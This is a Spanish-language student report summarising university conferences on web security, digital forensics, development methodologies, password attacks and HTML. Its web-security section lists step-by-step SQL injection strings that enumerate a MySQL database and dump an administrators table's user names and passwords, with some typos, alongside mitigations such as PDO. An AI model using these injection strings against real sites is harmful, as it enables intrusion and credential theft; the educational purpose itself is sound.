1. UNIVERSIDAD NACIONAL DE CHIMBORAZO
FACULTAD DE INGENIERIA
ESCUELA DE SISTEMAS
SISTEMAS DE INFORMACION GEOGRAFICA
Docente: Ing. Gonzalo Allauca
Nombre: Mónica Morocho
Curso: Quinto Año
Riobamba 23 de septiembre del 2013
2. INTRODUCCION
Las diferentes conferencias fueron presentadas para fortalecer los conocimientos
tecnológicos.
Las Conferencias tienen también como objetivo destacar la importancia de la educación en
distintos niveles para la toma de conciencia acerca del papel fundamental que implica en
nuestra vida cotidiana del hombre y representan una oportunidad para documentar buenas
prácticas de educación sobre los sistemas informáticos, compartir e intercambiar experiencias
y formular recomendaciones sobre los distintos temas.
OBJETIVOS
GENERAL.
Diseñar cursos virtuales como asistencia a las asignaturas dictadas en la carrera de
Ingeniería de Sistemas.
ESPECIFICOS.
Conocer la importancia sobre los distintos temas:
Seguridades web para desarrolladores.
Análisis forense.
Metodología de desarrollo de Sistemas de información.
Ataques que vulneran las contraseñas.
HTML.
Analizar el comportamiento estudiantil en las asignaturas pertenecientes a la carrera
de Ingeniería de Sistemas.
Seleccionar la herramienta adecuada para una correcta seguridad el ámbito
informático.
3. SEGURIDAD WEB PARA DESARROLLADORES.
La seguridad web no es una característica, son acciones.
El problema en la seguridad web está en constante crecimiento.
La seguridad debe ser considerada todo el tiempo de desarrollo es decir debe estar
durante todas las etapas.
Sqlinjection
Es un método de infiltración de código intruso que se vale de una vulnerabilidad informática
presente en una aplicación en el nivel de validación de las entradas para realizar consultas a
una base de datos.
Pasos
1. Valores tipo
?id=3 agregar.
2. Numero de columna
“ ?id=2+orden+by+1”
3. Columna vulnerable
“ -1+unión+select+1,2,3”
4. Version Myslq
“ -1+union+select+1,2,@@version,4,5”
5. Nombre base
“-1+union+select+1,2,group_concat(schema_name) + informatio_schema.schema”.
6. Nombres de tablas
“id=1+union+select+1,2,group_concat(table_name),4,5++from+information_schema.t
ables+where+table_schema=database()”
7. Final nombre de usuario
8. “id=1+union+select+1,2,group_concat(id,user_name,user_password),4,5+from+admini
strators”
Soluciones
Validar datos antes de usarlos en el SQL dinámico
Usar PDO
Usar mínimo mysql_real_escape_string.
El uso de addslashes() no es suficiente.
Cross-site Scripting (XSS)
XSS es un ataque de inyección de código malicioso para su posterior ejecución que puede
realizarse a sitios web, aplicaciones locales e incluso al navegador.
Soluciones
No confiar enlos datos que se obtienen
Saneando los datos.
Escapando los datos htmlspecialchars
Validaciones de datos de entradas
4. ANALISIS FORENSE.
Computo Forense
El cómputo forense, también llamado informática forense, computación forense, análisis
forense digital o examinación forense digital es la aplicación de técnicas científicas y analíticas
especializadas a infraestructura tecnológica que permiten identificar, preservar, analizar y
presentar datos que sean válidos dentro de un proceso legal.
Dichas técnicas incluyen reconstruir el bien informático, examinar datos residuales, autenticar
datos y explicar las características técnicas del uso aplicado a los datos y bienes informáticos
El análisis forense informático es una prueba clave en numerosas ocasiones, como por
ejemplo:
Revelación de secretos, espionaje industrial y confidencialidad
Delitos económicos, societarios o contra el mercado o los consumidores
Delitos contra la propiedad intelectual e industrial
Vulneración de la intimidad
Sabotaje
Uso indebido de equipos
Amenazas, calumnias e injurias
Cumplimiento de obligaciones y contratos
Pasos principales
La identificación
Es muy importante conocer los antecedentes.
Preservación.
Este paso incluye la revisión y generación de las imágenes forenses de la evidencia
Análisis.
Proceso de aplicar técnicas científicas y analíticas a los medios duplicados por medio
del proceso forense para poder encontrar pruebas de ciertas conductas.
Presentación.
Es el recopilar toda la información que se obtuvo a partir del análisis para realizar el
reporte y la presentación a los abogados.
METODOLOGÍA DE DESARROLLO DE SISTEMAS DE INFORMACIÓN
Metodología
Ciencia del método.Conjunto de métodos que se siguen en una investigación científica o en
una exposición doctrinal.
Métodos del desarrollo de sistemas de información
1.
2.
3.
4.
5.
6.
Especificación de requerimientos
Análisis.
Diseño.
Programación.
Pruebas
Implementación.
5. Objetivos
Asegurar la uniformidad y calidad tanto del desarrollo como del sistema.
Satisfacer las necesidades de los usuarios del sistema.
Conseguir un mayor nivel de rendimiento y eficiencia del personal asignado al
desarrollo.
Ajuste a los plazos y costos previstos en la planificación.
Generar de forma adecuada la documentación asociada a los sistemas.
Facilitar el mantenimiento posterior de los sistemas.
Cascada pura.
Beneficios.
Secuencia ordenada de métodos.
Está dirigido por documentos.
Detección temprana de errores.
Reduce costos de planificación.
Permite a la organización a generar capital humano.
Desventajas.
Avance lento del proyecto.
Resultados palpables solo al final del proyecto.
Exceso de documentación útil.
Volátil en tiempos de entrega.
Costos altos en inversión tecnología.
Pruebay error.
Poco útil, bastante común.
No requiere definición formal.
Es intuitiva.
De rápido acceso a puesta en producción.
Es eficiente para pequeños proyectos.
No genera documentación.
Excede en confianza.
Método prototipo
Requiere de un usuario experto.
Genera un sistema que funciona.
El requerimiento de información no está bien definido.
Genera un sistema piloto de pruebas.
Garantiza funcionalidad pero no desempeño.
Modelo en espiral
Es un modelo de proceso de software evolutivo, enlaza prototipos y cascada.
Genera un crecimiento incremental de grado de definición e implementación.
Precisa puntos de retorno.
Provoca toma de decisiones más certeras.
6. Útil para grandes desarrollos.
Scrum
Metodología ágil y flexible.
Muy alto involucramiento del usuario.
Reuniones programadas diarias.
Construye primero la funcionalidad de mayor valor para el cliente.
Entregas parciales funcionales.
Genera capital humano interno a la organización.
ATAQUES QU VULNERAN LA CONTRASEÑA.
Que alguien la adivine
Si tu contraseña es muy obvia, puede resultar fácil para el vecino que quiere colgarse a tu WiFi
adivinar que la contraseña es el número de departamento, o tu apellido, o algo así.
Ataques de fuerza bruta
Un ataque bastante común, donde un hacker intenta apuntarle por la fuerza a la contraseña
intentando todas las combinaciones posibles de letras (aaaa, aaab, aaac...) hasta llegar a la
tuya. La única manera de volverse resistente a esto es con contraseñas más largas y complejas,
que hacen que el proceso se demore más de lo que el hacker está dispuesto a esperar.
Ataque de palabras comunes
En lugar de usar combinaciones de letras, se usan combinaciones de palabras que existen,
como árbol, casa, sol, etc.
Ataque diccionario
En lugar de sólo usar palabras comunes, se usa un diccionario de contraseñas comunes (hay
múltiples bases de datos de esto que crecen con cada hackeo).
Métodos de Autenticación.
Algo que se.
Algo que tengo.
Algo que soy.
Construyendo una contraseña fuerte
Usa un mínimo de 8 caracteres.
No repetir las letras y si lo haces procura que alguna esté en mayúscula.
Utilizar todo tipo de caracteres especiales y signos de puntuación.
No usar información personal en la elaboración de estas (nombre de tu mascota o
fecha de cumpleaños).
HTML
Es un estándar que, en sus diferentes versiones, define una estructura básica y un código
(denominado código HTML) para la definición de contenido de una página web, como texto,
imágenes, etc.
7. El HTML se escribe en forma de «etiquetas», rodeadas por corchetes angulares (<,>). HTML
también puede describir, hasta un cierto punto, la apariencia de un documento, y puede
incluir o hacer referencia a un tipo de programa llamado script, el cual puede afectar el
comportamiento de navegadores web y otros procesadores de HTML.
Para crear una página web se pueden utilizar varios programas especializadosEstructura de los
documentos de HTML.
Un documento escrito en HTML contiene las siguientes etiquetas en el siguiente orden:
<HTML>
<HEAD>
<TITLE> Título de mi página de Internet </TITLE>
</HEAD>
<BODY>
<H1><CENTER>Primerapagina</CENTER></H1>
<HR>
8. CONCLUSIONES
Es importante resaltar el aporte educativo a nivel tecnológico que fue presentada en cada una
de las conferencias, además se debe considerar los diferentes tipos de avances a nivel
tecnológico e informático para de este modo poder tener soluciones a problemas generados
por los mismos.
RECOMENDACIONES
Incentivar a la institución este tipo de eventos para mejorar la calidad educativa de la misma.
BIBLIOGRAFIA.
Video conferencias.